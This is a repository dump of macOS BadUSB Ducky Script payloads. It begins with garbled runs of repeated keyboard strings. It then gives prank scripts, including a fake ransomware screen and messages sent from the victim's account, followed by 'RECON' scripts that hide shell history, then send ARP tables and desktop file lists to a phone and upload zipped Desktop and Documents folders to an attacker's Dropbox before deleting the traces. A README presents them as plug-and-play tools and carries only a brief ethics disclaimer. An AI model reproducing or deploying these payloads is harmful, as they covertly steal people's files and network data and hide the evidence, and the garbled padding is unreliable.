qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 67 | DELAY 500 68 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 69 | DELAY 500 70 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 71 | DELAY 500 72 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 73 | UPARROW 74 | DELAY 500 75 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 76 | DELAY 500 77 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 78 | DELAY 500 79 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 80 | DELAY 500 81 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 82 | DELAY 500 83 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 84 | DELAY 500 85 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 86 | DELAY 5000 87 | ALT F4qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopH1642579qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop0qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 88 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Pranks/IPHONE Fake Update.txt: -------------------------------------------------------------------------------- 1 | REM Author: Narsty 2 | REM Description: Open Fake update on an iPhone. 3 | REM Version: 1.0 4 | REM Category: iPhone 5 | 6 | 7 | ID 05ac:021e Apple:Keyboard 8 | DELAY 1000 9 | GUI SPACE 10 | DELAY 500 11 | STRING safari 12 | DELAY 2000 13 | ENTER 14 | DELAY 500 15 | GUI-CTRL f 16 | DELAY 500 17 | STRING www.fakeupdate.net 18 | DELAY 500 19 | ENTER 20 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Pranks/JasonBourneMessage Hack.txt: -------------------------------------------------------------------------------- 1 | REM Title: Message Hack 2 | REM Author: NARSTY 3 | REM Description: Opens Messages and types "Ive been hacked please help!" To the first contact 4 | REM Will close and repeat but the second message will be "Jesus Christ... It's Jason Bourne!" 5 | REM Target: MacOS 6 | REM Version: 1.0 7 | REM Category: Prank 8 | 9 | ID 05ac:021e Apple:Keyboard 10 | DELAY 1000 11 | GUI SPACE 12 | DELAY 200 13 | STRING Messages 14 | DELAY 1000 15 | ENTER 16 | DELAY 3000 17 | STRING Ive been hacked please help! 18 | DELAY 500 19 | ENTER 20 | DELAY 200 21 | GUI w 22 | DELAY 1000 23 | GUI SPACE 24 | DELAY 200 25 | STRING Messages 26 | DELAY 1000 27 | ENTER 28 | DELAY 3000 29 | STRING Jesus Christ... It's Jason Bourne! 30 | DELAY 500 31 | ENTER 32 | DELAY 200 33 | GUI w 34 | 35 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Pranks/MacWildRideV2.txt: -------------------------------------------------------------------------------- 1 | REM Title: MacWildRide V2 2 | REM Author: Narsty & Ecto-1A 3 | REM Description: Opens terminal and runs the "top' command to display Cur processes 4 | REM It then builds a fake terminal window saying the computer is being encrypted. 5 | REM Target: MacOS 6 | REM Version: 1.0 7 | REM Category: Prank 8 | 9 | 10 | ID 05ac:021e Apple:Keyboard 11 | DELAY 500 12 | GUI SPACE 13 | DELAY 1000 14 | STRING Terminal 15 | DELAY 250 16 | ENTER 17 | DELAY 500 18 | STRING top 19 | DELAY 250 20 | ENTER 21 | GUI-CTRL F 22 | DELAY 8000 23 | ENTER 24 | DELAY 1000 25 | CONTROL C 26 | DELAY 250 27 | ENTER 28 | DELAY 550 29 | STRING echo -e "\e[101;30;5m ENCRYPTING DATA ON SYSTEM" 30 | DELAY 250 31 | ENTER 32 | DELAY 250 33 | STRING ' 34 | DELAY 250 35 | ENTER 36 | STRING PASSWORDS: ......10%......50%......100% SUCCESS! 37 | DELAY 1000 38 | ENTER 39 | DELAY 250 40 | STRING BANK ACCOUNTS: ......10%......50%......100% SUCCESS! 41 | DELAY 1000 42 | ENTER 43 | DELAY 250 44 | STRING PHOTOS: ......10%......50%......100% SUCCESS! 45 | DELAY 1000 46 | ENTER 47 | DELAY 250 48 | STRING ~ALL FILES SUCCESSFULLY ENCRYPTED~ 49 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Pranks/RIckRoll.txt: -------------------------------------------------------------------------------- 1 | REM Description: Opens Safari and redirects to YouTube rickroll vid 2 | REM Volume is turned up and proceeds to be pressed so you cannot turn the Vol down 3 | 4 | 5 | REM Title: Rick Roll 6 | REM Author: NARSTY 7 | REM Target: MacOS 8 | REM Version: 1.0 9 | REM Category: Prank 10 | 11 | ID 05ac:021e Apple:Keyboard 12 | DELAY 1000 13 | GUI SPACE 14 | DELAY 200 15 | STRING terminal 16 | DELAY 1000 17 | ENTER 18 | DELAY 1000 19 | STRING open -a Safari 'https://www.youtube.com/watch?v=eGci8By2G8s' 20 | DELAY 1000 21 | ENTER 22 | DELAY 1000 23 | F12 24 | DELAY 500 25 | F12 26 | DELAY 500 27 | F12 28 | DELAY 500 29 | F12 30 | DELAY 500 31 | F12 32 | DELAY 500 33 | F12 34 | DELAY 500 35 | F12 36 | DELAY 500 37 | F12 38 | DELAY 500 39 | F12 40 | DELAY 500 41 | F12 42 | DELAY 500 43 | F12 44 | DELAY 500 45 | F12 46 | DELAY 500 47 | F12 48 | DELAY 500 49 | F12 50 | DELAY 500 51 | F12 52 | DELAY 500 53 | F12 54 | DELAY 500 55 | F12 56 | DELAY 500 57 | F12 58 | DELAY 500 59 | F12 60 | DELAY 500 61 | F12 62 | DELAY 500 63 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Pranks/Rainbow Matrix.txt: -------------------------------------------------------------------------------- 1 | REM Run a Colorful Matrix Animation with different color sequences 2 | REM Required Apps: Terminal, cmatrix (installed via Homebrew) 3 | 4 | 5 | REM Title: Rainbow Matrix 6 | REM Author: Narsty 7 | REM Target: MacOS 8 | REM Version: 1.0 9 | REM Category: Prank 10 | 11 | 12 | ID 05ac:021e Apple:Keyboard 13 | GUI SPACE 14 | DELAY 500 15 | STRING terminal.app 16 | DELAY 500 17 | ENTER 18 | DELAY 1000 19 | CTRL c 20 | DELAY 5000 21 | STRING cd ~ 22 | DELAY 500 23 | ENTER 24 | DELAY 500 25 | GUI-CTRL f 26 | DELAY 7000 27 | STRING brew install cmatrix 28 | DELAY 500 29 | ENTER 30 | DELAY 6000 31 | STRING cmatrix -C red 32 | DELAY 500 33 | ENTER 34 | DELAY 6000 35 | STRING cmatrix -C green 36 | DELAY 500 37 | ENTER 38 | DELAY 2000 39 | STRING cmatrix -C blue 40 | DELAY 500 41 | ENTER 42 | DELAY 2000 43 | STRING cmatrix -C yellow 44 | DELAY 500 45 | ENTER 46 | DELAY 3000 47 | STRING cmatrix -C cyan 48 | DELAY 500 49 | ENTER 50 | DELAY 7000 51 | STRING cmatrix -C magenta 52 | DELAY 200 53 | ENTER 54 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Pranks/Random Noises.txt: -------------------------------------------------------------------------------- 1 | REM Plays 40 random nosies in 20 seconds 2 | 3 | REM Author: Narsty 4 | REM Title: Random Noises 5 | REM Version 1.0 MacOs 6 | REM Category: Prank 7 | 8 | ID 05ac:021e Apple:Keyboard 9 | DELAY 1000 10 | 11 | GUI SPACE 12 | DELAY 500 13 | STRING Terminal 14 | DELAY 500 15 | ENTER 16 | DELAY 2000 17 | 18 | STRING start_time=$(date +%s) 19 | ENTER 20 | DELAY 1000 21 | 22 | STRING afplay /System/Library/Sounds/Ping.aiff 23 | ENTER 24 | DELAY 500 25 | STRING sleep 1 26 | ENTER 27 | DELAY 500 28 | STRING afplay /System/Library/Sounds/Glass.aiff 29 | ENTER 30 | DELAY 500 31 | STRING sleep 1 32 | ENTER 33 | DELAY 500 34 | STRING afplay /System/Library/Sounds/Submarine.aiff 35 | ENTER 36 | DELAY 500 37 | STRING sleep 1 38 | ENTER 39 | DELAY 500 40 | STRING afplay /System/Library/Sounds/Funk.aiff 41 | ENTER 42 | DELAY 500 43 | STRING sleep 1 44 | ENTER 45 | DELAY 500 46 | STRING afplay /System/Library/Sounds/Hero.aiff 47 | ENTER 48 | DELAY 500 49 | STRING sleep 1 50 | ENTER 51 | DELAY 500 52 | STRING afplay /System/Library/Sounds/Pop.aiff 53 | ENTER 54 | DELAY 500 55 | STRING sleep 1 56 | ENTER 57 | DELAY 500 58 | STRING afplay /System/Library/Sounds/Basso.aiff 59 | ENTER 60 | DELAY 500 61 | STRING sleep 1 62 | ENTER 63 | DELAY 500 64 | STRING afplay /System/Library/Sounds/Blow.aiff 65 | ENTER 66 | DELAY 500 67 | STRING sleep 1 68 | ENTER 69 | DELAY 500 70 | STRING afplay /System/Library/Sounds/Bottle.aiff 71 | ENTER 72 | DELAY 500 73 | STRING sleep 1 74 | ENTER 75 | DELAY 500 76 | STRING afplay /System/Library/Sounds/Frog.aiff 77 | ENTER 78 | DELAY 500 79 | STRING sleep 1 80 | ENTER 81 | DELAY 500 82 | STRING afplay /System/Library/Sounds/Ping.aiff 83 | ENTER 84 | DELAY 500 85 | STRING sleep 1 86 | ENTER 87 | DELAY 500 88 | STRING afplay /System/Library/Sounds/Glass.aiff 89 | ENTER 90 | DELAY 500 91 | STRING sleep 1 92 | ENTER 93 | DELAY 500 94 | STRING afplay /System/Library/Sounds/Submarine.aiff 95 | ENTER 96 | DELAY 500 97 | STRING sleep 1 98 | ENTER 99 | DELAY 500 100 | STRING afplay /System/Library/Sounds/Funk.aiff 101 | ENTER 102 | DELAY 500 103 | STRING sleep 1 104 | ENTER 105 | DELAY 500 106 | STRING afplay /System/Library/Sounds/Hero.aiff 107 | ENTER 108 | DELAY 500 109 | STRING sleep 1 110 | ENTER 111 | DELAY 500 112 | STRING afplay /System/Library/Sounds/Pop.aiff 113 | ENTER 114 | DELAY 500 115 | STRING sleep 1 116 | ENTER 117 | DELAY 500 118 | STRING afplay /System/Library/Sounds/Basso.aiff 119 | ENTER 120 | DELAY 1000 121 | STRING sleep 1 122 | ENTER 123 | DELAY 500 124 | STRING afplay /System/Library/Sounds/Blow.aiff 125 | ENTER 126 | DELAY 500 127 | STRING sleep 1 128 | ENTER 129 | DELAY 500 130 | STRING afplay /System/Library/Sounds/Bottle.aiff 131 | ENTER 132 | DELAY 500 133 | STRING sleep 1 134 | ENTER 135 | DELAY 500 136 | STRING afplay /System/Library/Sounds/Frog.aiff 137 | ENTER 138 | DELAY 500 139 | STRING sleep 1 140 | ENTER 141 | DELAY 500 142 | STRING afplay /System/Library/Sounds/Ping.aiff 143 | ENTER 144 | DELAY 500 145 | STRING sleep 1 146 | ENTER 147 | DELAY 500 148 | STRING afplay /System/Library/Sounds/Glass.aiff 149 | ENTER 150 | DELAY 500 151 | STRING sleep 1 152 | ENTER 153 | DELAY 500 154 | STRING afplay /System/Library/Sounds/Submarine.aiff 155 | ENTER 156 | DELAY 500 157 | STRING sleep 1 158 | ENTER 159 | DELAY 500 160 | STRING afplay /System/Library/Sounds/Funk.aiff 161 | ENTER 162 | DELAY 500 163 | STRING sleep 1 164 | ENTER 165 | DELAY 500 166 | STRING afplay /System/Library/Sounds/Hero.aiff 167 | ENTER 168 | DELAY 500 169 | STRING sleep 1 170 | ENTER 171 | DELAY 500 172 | STRING afplay /System/Library/Sounds/Pop.aiff 173 | ENTER 174 | DELAY 500 175 | STRING sleep 1 176 | ENTER 177 | DELAY 500 178 | STRING afplay /System/Library/Sounds/Basso.aiff 179 | ENTER 180 | DELAY 500 181 | STRING sleep 1 182 | ENTER 183 | DELAY 500 184 | STRING afplay /System/Library/Sounds/Blow.aiff 185 | ENTER 186 | DELAY 500 187 | STRING sleep 1 188 | ENTER 189 | DELAY 500 190 | STRING afplay /System/Library/Sounds/Bottle.aiff 191 | ENTER 192 | DELAY 500 193 | STRING sleep 1 194 | ENTER 195 | DELAY 500 196 | STRING afplay /System/Library/Sounds/Frog.aiff 197 | ENTER 198 | DELAY 500 199 | STRING sleep 1 200 | ENTER 201 | DELAY 1000 202 | 203 | GUI q 204 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Pranks/Terminal Tetris.txt: -------------------------------------------------------------------------------- 1 | REM you'll be able to play a Tetris-like game right in your terminal. 2 | REM you may need to adjust the delays based on your internet connection speed and system performance. 3 | 4 | REM Title: Terminal Tetris 5 | REM Author: Narsty 6 | REM Target: MacOS 7 | REM Version: 1.0 8 | REM Category: Prank 9 | 10 | 11 | 12 | ID 05ac:021e Apple:Keyboard 13 | DELAY 1000 14 | GUI SPACE 15 | DELAY 500 16 | STRING Terminal 17 | DELAY 500 18 | ENTER 19 | DELAY 500 20 | GUI-CTRL f 21 | DELAY 2000 22 | STRING clear 23 | ENTER 24 | DELAY 500 25 | STRING brew install bastet 26 | ENTER 27 | DELAY 18000 28 | STRING bastet 29 | GUI + 30 | DELAY 250 31 | GUI + 32 | DELAY 250 33 | GUI + 34 | DELAY 250 35 | GUI + 36 | DELAY 250 37 | GUI + 38 | DELAY 500 39 | ENTER 40 | 41 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Pranks/Thomas The Train.txt: -------------------------------------------------------------------------------- 1 | REM Run Terminal Train Animation 2 | REM Required Apps: Terminal, sl (installed via Homebrew) 3 | REM Run Terminal Train Animation 4 | 5 | 6 | REM Title: Thomas The Train 7 | REM Author: Narsty 8 | REM Target: MacOS 9 | REM Version: 1.0 10 | REM Category: Prank 11 | 12 | 13 | 14 | ID 05ac:021e Apple:Keyboard 15 | GUI SPACE 16 | DELAY 100 17 | STRING terminal.app 18 | DELAY 100 19 | ENTER 20 | DELAY 1000 21 | CTRL c 22 | DELAY 100 23 | STRING cd ~ 24 | DELAY 100 25 | ENTER 26 | DELAY 100 27 | GUI CTRL f 28 | DELAY 700 29 | STRING brew install sl 30 | DELAY 100 31 | ENTER 32 | DELAY 2000 33 | STRING sl 34 | DELAY 100 35 | ENTER 36 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Pranks/colorful Date and time display.txt: -------------------------------------------------------------------------------- 1 | REM The command date | figlet | lolcat generates a large. 2 | REM colorful representation of the current date and time in the terminal window. 3 | REM To stop the animation, you can interrupt the script by pressing CTRL+C. 4 | 5 | 6 | REM Title: colorful Date and time display 7 | REM Author: Narsty 8 | REM Target: MacOS 9 | REM Version: 1.0 10 | REM Category: Prank 11 | 12 | 13 | 14 | ID 05ac:021e Apple:Keyboard 15 | DELAY 1000 16 | GUI SPACE 17 | DELAY 500 18 | STRING Terminal 19 | DELAY 500 20 | ENTER 21 | DELAY 500 22 | GUI-CTRL f 23 | DELAY 2000 24 | STRING clear 25 | ENTER 26 | DELAY 500 27 | STRING brew install figlet lolcat 28 | ENTER 29 | DELAY 15000 30 | STRING while true; do date | figlet | lolcat; sleep 1; clear; done 31 | DELAY 1000 32 | ENTER 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Pranks/pipeseroni.txt: -------------------------------------------------------------------------------- 1 | REM Runs the curl command to download pipes 2 | REM a fun colorful temrinal screensaver like the old windows Pipes 3 | 4 | 5 | REM Title: pipeseroni 6 | REM Author: Narsty 7 | REM Target: MacOS 8 | REM Version: 1.0 9 | REM Category: Prank 10 | 11 | 12 | 13 | ID 05ac:021e Apple:Keyboard 14 | DELAY 1000 15 | GUI SPACE 16 | DELAY 500 17 | STRING Terminal 18 | DELAY 500 19 | ENTER 20 | DELAY 500 21 | GUI-CTRL f 22 | DELAY 2000 23 | STRING clear 24 | ENTER 25 | DELAY 500 26 | STRING curl -L https://raw.githubusercontent.com/pipeseroni/pipes.sh/master/pipes.sh -o pipes.sh 27 | ENTER 28 | DELAY 5000 29 | STRING chmod +x pipes.sh 30 | ENTER 31 | DELAY 500 32 | STRING ./pipes.sh 33 | ENTER 34 | 35 | 36 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 |
14 | 15 | 16 | 17 | 18 |
19 | 20 | 21 | 22 | 23 | 24 |

This repository is EXCLUSIVE to MacOs BADUSB Scripts Giphy Image 26 | 27 | Coding 28 | 29 | 30 | 31 | 32 |
33 | Giphy Image 34 |
35 | 36 |
37 | 38 | ## 🔹 They are Plug & Play 🔹 39 | 40 |
41 | 42 | ## Acknowledgements 43 | Thanks for this Amazing DuckyScript Repo [narstybits](https://github.com/narstybits/MacOS-DuckyScripts) 44 | 45 | A big shoutout and huge thanks to these amazing contributors: 46 | - [47LeCoste](https://github.com/grugnoymeme) 47 | - [ClaraCrazy](https://github.com/ClaraCrazy) 48 | - [0iphor13](https://github.com/0iphor13) 49 | - [Hak5](https://github.com/hak5) 50 | - [I-Am-Jakoby](https://github.com/I-Am-Jakoby) 51 | - [UberGuidoZ](https://github.com/UberGuidoZ) 52 | 53 | 54 |

55 | ❗️ Remember, it is crucial to prioritize legal and ethical practices, protect user privacy, and use these tools responsibly to improve security and protect against real-world threats. 56 |

57 | 58 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/RECON/Arp table to Iphone.txt: -------------------------------------------------------------------------------- 1 | REM This script uses the "x=$(arp -a)" command to retrieve ARP table information. 2 | REM Then it sends the information to your iPhone. 3 | 4 | 5 | REM Shoutout to matthewkayne and 0iphor13 for the Phone code part. 6 | REM Replace "Phone Number HERE" with your phone number to receive MacOs System information 7 | 8 | 9 | REM Title: Arp table to Iphone 10 | REM Author: NARSTY 11 | REM Target: MacOS 12 | REM Version: 1.0 13 | REM Category: Recon 14 | 15 | 16 | 17 | ID 05ac:021e Apple:Keyboard 18 | DELAY 500 19 | GUI SPACE 20 | DELAY 500 21 | STRING terminal 22 | DELAY 1000 23 | ENTER 24 | DELAY 500 25 | STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash 26 | DELAY 500 27 | ENTER 28 | DELAY 500 29 | STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') 30 | DELAY 500 31 | ENTER 32 | DELAY 500 33 | ENTER 34 | DELAY 500 35 | STRING x=$(arp -a); osascript -e 'tell application "Messages" to send "'"$x"'" to buddy "Phone Number HERE"' 36 | DELAY 1000 37 | ENTER 38 | DELAY 5000 39 | GUI w 40 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/RECON/Copy All JPEG Images.txt: -------------------------------------------------------------------------------- 1 | REM This script opens the terminal. 2 | REM It searches for all JPEG image files located on the entire hard drive. 3 | REM It copies the found JPEG images to a folder named "Images" in the destination of your choice. 4 | 5 | REM Author: Narsty 6 | REM Title: Copy All JPEG Images 7 | REM Target: MacOS 8 | REM Version: 1.0 9 | REM Category: 10 | 11 | 12 | ID 05ac:021e Apple:Keyboard 13 | DELAY 300 14 | GUI SPACE 15 | DELAY 500 16 | STRING terminal 17 | DELAY 1000 18 | ENTER 19 | DELAY 1000 20 | STRING find / -type f -iname "*.jpeg" -exec cp {} ~/Insert Destination here /Images/ \; 21 | DELAY 2000 22 | ENTER 23 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/RECON/Desktop Data to Dropbox.txt: -------------------------------------------------------------------------------- 1 | REM This script copies the contents of the Desktop and uploads it to a specific dropbox API 2 | REM Just replace "" with your actual API access token. line 36 3 | REM Once the desktop contents .zip is uploaded to your dropbox 4 | REM The Backup folder containing the .zip will be deleted and the terminal will be cleared and closed. 5 | 6 | REM Author: Narsty 7 | REM Title: Desktop Data to Dropbox 8 | REM Version 2.0 MacOs 9 | REM Category: Recon 10 | 11 | 12 | ID 05ac:021e Apple:Keyboard 13 | DELAY 500 14 | GUI SPACE 15 | DELAY 500 16 | STRING Terminal 17 | DELAY 1000 18 | ENTER 19 | DELAY 500 20 | STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash 21 | DELAY 500 22 | ENTER 23 | DELAY 500 24 | STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') 25 | DELAY 500 26 | ENTER 27 | DELAY 500 28 | ENTER 29 | DELAY 500 30 | STRING mkdir -p ~/Desktop/Backup 31 | ENTER 32 | DELAY 500 33 | STRING cp -R ~/Desktop/* ~/Desktop/Backup/ 34 | ENTER 35 | DELAY 500 36 | STRING echo 'cd ~/Desktop/Backup && zip -r backup.zip . && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/Backup/backup.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @backup.zip' > upload.sh 37 | ENTER 38 | DELAY 2500 39 | ENTER 40 | STRING chmod +x upload.sh 41 | ENTER 42 | DELAY 500 43 | STRING nohup ./upload.sh >/dev/null 2>&1 & 44 | ENTER 45 | DELAY 2000 46 | CTRL C 47 | DELAY 500 48 | STRING rm ~/Desktop/Backup 49 | DELAY 2000 50 | STRING rm upload.sh 51 | DELAY 500 52 | ENTER 53 | DELAY 5000 54 | STRING rm backup.zip 55 | DELAY 2000 56 | ENTER 57 | DELAY 500 58 | STRING CLEAR 59 | DELAY 500 60 | ENTER 61 | DELAY 500 62 | GUI w 63 | DELAY 1000 64 | ENTER 65 | DELAY 500 66 | ENTER 67 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/RECON/Desktop file list to iPhone.txt: -------------------------------------------------------------------------------- 1 | REM This script gets a list of the files on the Desktop, 2 | REM then it sends the list to your iphone. 3 | REM Shoutout to matthewkayne and 0iphor13 for the Phone code part. 4 | 5 | REM Replace "Phone Number HERE" with your phone number to receive MacOs System information 6 | 7 | REM Title: Desktop file list to iPhone 8 | REM Author: NARSTY 9 | REM Target: MacOS 10 | REM Version: 1.0 11 | REM Category: Recon 12 | 13 | 14 | ID 05ac:021e Apple:Keyboard 15 | DELAY 500 16 | GUI SPACE 17 | DELAY 500 18 | STRING terminal 19 | DELAY 1000 20 | ENTER 21 | DELAY 500 22 | STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash 23 | DELAY 500 24 | ENTER 25 | DELAY 500 26 | STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') 27 | DELAY 500 28 | ENTER 29 | ENTER 30 | DELAY 500 31 | STRING x=$(ls /Users/*/Desktop); osascript -e 'tell application "Messages" to send "'$x'" to buddy "Phone Number HERE"' 32 | DELAY 500 33 | ENTER 34 | DELAY 500 35 | ENTER 36 | DELAY 2000 37 | GUI h 38 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/RECON/Document to Dropbox API.txt: -------------------------------------------------------------------------------- 1 | REM This script Creates a folder in the tmp directory 2 | REM copies the contents of the Documents into the tmp folder zips it 3 | REM zips it and uploads it to a specific dropbox API 4 | 5 | REM Replace "" with your actual API access token. 6 | 7 | REM Title: Document to Dropbox API 8 | REM Author: Narsty 9 | REM Version 1.0 MacOs 10 | REM Category: Recon 11 | 12 | 13 | DELAY 500 14 | GUI SPACE 15 | DELAY 500 16 | STRING Terminal 17 | DELAY 1000 18 | ENTER 19 | DELAY 500 20 | STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash 21 | DELAY 500 22 | ENTER 23 | DELAY 500 24 | STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') 25 | DELAY 500 26 | ENTER 27 | DELAY 500 28 | ENTER 29 | DELAY 500 30 | STRING mkdir -p /tmp/Backup/Documents 31 | ENTER 32 | DELAY 500 33 | STRING cp -R ~/Documents/. /tmp/Backup/Documents 34 | ENTER 35 | DELAY 500 36 | STRING cd /tmp/Backup && zip -r backup.zip Documents 37 | ENTER 38 | DELAY 500 39 | STRING curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/Backup/backup.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @backup.zip 40 | DELAY 1000 41 | ENTER 42 | DELAY 10000 43 | STRING rm /tmp/Backup/backup.zip 44 | ENTER 45 | DELAY 500 46 | STRING rm -r /tmp/Backup/Documents 47 | ENTER 48 | DELAY 500 49 | STRING clear 50 | DELAY 250 51 | ENTER 52 | DELAY 500 53 | GUI w 54 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/RECON/Dropbox File Downloader.txt: -------------------------------------------------------------------------------- 1 | REM Replace with the actual URL for the file you want to download. 2 | REM Additionally, replace filename with the desired name and extension for the downloaded file. 3 | REM the script will download a file to the target MacOs desktop 4 | 5 | 6 | 7 | REM Author: Narsty 8 | REM Title: Dropbox File Downloader 9 | REM Version 1.0 MacOs 10 | REM Category: Recon 11 | 12 | ID 05ac:021e Apple:Keyboard 13 | DELAY 500 14 | GUI SPACE 15 | DELAY 500 16 | STRING terminal 17 | DELAY 1000 18 | ENTER 19 | DELAY 500 20 | STRING echo -e "export HISTCONTROL=ignorespace\nunset 